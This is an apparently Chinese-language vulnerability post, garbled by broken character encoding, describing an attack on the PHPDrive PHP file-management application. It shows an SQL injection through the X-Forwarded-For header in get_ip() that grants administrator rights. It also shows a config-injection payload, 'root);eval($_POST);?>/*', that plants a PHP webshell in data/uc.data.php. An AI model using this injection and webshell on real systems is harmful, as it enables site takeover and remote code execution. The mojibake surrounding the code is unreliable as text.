admin 2012-12-31 09:18:34

PHPDriveȨ©

PHPDrive һ PHP ļϵͳӦ̡ҵļѧУŶӹվļCMS

includes/user.lib.php
87
function get_ip() {
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
ûע¼ module/disk/account.lead.php
198
//±ε¼IPʱ
             $db->Query(UPDATE `.$db->TPre.user` SET `before_last_date` = .$UserArr['last_date'].,`last_date` = .$NowUnixTime.,`before_last_ip` = .$UserArr['last_ip'].,`last_ip` = .get_ip(). WHERE `uid` = .$UserArr['uid'].;');//get_ip()ע
ڱ׳usermanagerǴͬһµģֻgroupֶ,group=1ΪԱ2ΪͨûԿע룬ͨûgroupֵΪ1Ȩ
ʵַʹfirefoxһx-forwarded-for Header 1.0,IPַΪ123,`group`=1Ȼ½ʱǹԱ.
̨getshell:
UCenterôUCݿ¼дΪ

root);eval($_POST);?>/*
Եõһshell,λ data/uc.data.php

޸ע

ҳ: [1]
鿴汾: PHPDriveȨ©